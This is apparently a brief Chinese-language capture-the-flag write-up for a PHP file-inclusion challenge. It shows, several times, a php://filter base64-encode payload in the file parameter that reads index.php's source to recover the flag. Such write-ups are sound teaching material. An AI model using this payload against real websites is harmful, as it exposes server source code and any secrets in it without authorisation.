

点击

访问一下index.php

页面报错
既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload
?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦
?file=php://filter/read=convert.base64-encode/resource=index.php
?file=php://filter/read=convert.base64-encode/resource=index.php
file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容